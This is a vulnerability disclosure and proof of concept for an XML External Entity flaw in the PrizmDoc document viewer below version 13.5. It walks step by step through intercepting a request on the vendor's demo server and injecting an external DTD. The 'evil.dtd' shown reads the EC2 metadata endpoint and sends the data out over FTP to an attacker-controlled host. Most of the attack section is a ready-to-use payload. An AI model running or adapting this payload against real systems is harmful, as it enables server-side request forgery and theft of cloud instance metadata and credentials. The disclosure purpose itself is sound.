About PrizmDoc:
PrizmDoc is a web-based online document viewer and can be embedded into any web page or linked to from any website. The Viewing Client uses AJAX technology to communicate with the server to create a fast rendering of your content on the fly.
Vulnerability:
An XML External Entity attack is a type of attack against an application that parses XML input. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.
Vulnerable System:
PrizmDoc < 13.5
I didn’t have test server, so I performed the test for POC on their demo server located here:
Exploit:
1. Browse to URL: https://www.accusoft.com/demos/file-type-demo/
2. Scroll down to viewer.
3. Click on download.
4. Choose Download as PDF, tick corresponding to redactions.
5. Click on download.
6. Intercept the request using burp suite, the request will be such as:
POST /pcc/ViewingSession/ud6e8-z6riLGCd8LEK-08IonE_yHaGKTl3npOe2Z2dfJ_qnX5YVH2HT2BtFySMgBxT41T9CKW_YG_ilHEFwDhPra9NpkapKoxPWEk2FC 5Zk/MarkupBurner HTTP/1.1
Host: pcc-demos.accusoft.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/xml
Accusoft-Gid: GYiW8kmOutLSMTRWwxC45w
Accusoft-Parent-Name: ViewerControl
Accusoft-Parent-Pid: 0
Accusoft-Parent-Taskid: 0
Referer: https://www.accusoft.com/demos/file-type-demo/
Content-Length: 413
Origin: https://www.accusoft.com
Connection: close<documentAnnotations><pages><page id="1" pageWidth="1440" pageHeight="810"></page><page id="2" pageWidth="1440" pageHeight="810"></page><page id="3" pageWidth="1440" pageHeight="810"></page><page id="4" pageWidth="1440" pageHeight="810"></page></pages><highlights /></documentAnnotations>7. Modify the above request to include the external DTD such as:
<?xml version=”1.0" encoding=”UTF-8"?><!DOCTYPE a [ <!ENTITY % asd SYSTEM
“http://external.url/evil.dtd"> %asd; %c;]> <documentAnnotations>&rrr;<pages><page
id=”1" pageWidth=”1440" pageHeight=”810"></page><page id=”2" pageWidth=”1440"
pageHeight=”810"></page><page id=”3" pageWidth=”1440"
pageHeight=”810"></page><page id=”4" pageWidth=”1440"
pageHeight=”810"></page></pages><highlights /></documentAnnotations>In above payload, we have defined external DTD with entity pointing to external url which contains a dtd file and then call the entity as &rrr; inside
<documentAnnotations>
The DTD file should be like:
Evil.dtd:
<!ENTITY % d SYSTEM “http://169.254.169.254/latest/meta-data/hostname">
<!ENTITY % c “<!ENTITY rrr SYSTEM ‘ftp://x.x.x.x:2121/%d;'>">
After setting up, please run the emulated ftp server on a port and make sure this port should be mentioned in evil.dtd for a back connection (p.s https://www.secmasters.com/blog/soap-based-unauthenticated-out-of-band-xml-external-entity-oob-xxe-in-a-help-desk-software for this setup)
<!ENTITY rrr SYSTEM ‘ftp://your-vps-ip:2121/%d;'>">8. Now, Modify the http request as shown in step 6 with XXE payload as shown in step 7 and replay it as shown in screenshot:
Please notice the ftp server, you will receive a back connection with EC2 metadata as shown in screenshot:
VIDEO POC: